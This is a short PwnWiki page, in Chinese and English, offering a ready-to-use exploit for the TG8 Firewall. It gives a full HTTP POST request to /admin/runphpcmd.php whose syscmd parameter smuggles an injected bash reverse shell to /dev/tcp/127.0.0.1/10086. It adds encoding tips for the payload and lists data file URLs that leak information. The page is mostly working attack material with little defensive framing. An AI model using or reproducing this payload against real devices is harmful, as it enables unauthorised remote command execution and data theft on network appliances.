TG8 Firewall RCE&信息洩露漏洞

From PwnWiki
Revision as of 09:35, 17 May 2021 by Pwnwiki (talk | contribs) (Created page with "==Payload== <pre> POST /admin/runphpcmd.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: applica...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Payload

POST /admin/runphpcmd.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Connection: keep-alive
syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+%3Bbash%2F-i%2F>&%2F/dev/tcp/127.0.0.1/10086%2F0>&1%3B++local

空格用%2f替換,‘;’用%3B替換

信息泄露

http://127.0.0.1/data/w-341.tg
http://127.0.0.1/data/w-342.tg
http://127.0.0.1/data/r-341.tg
http://127.0.0.1/data/r-342.tg
Retrieved from "https://pwnwiki.com/index.php?title=TG8_Firewall_RCE%26信息洩露漏洞&oldid=2877"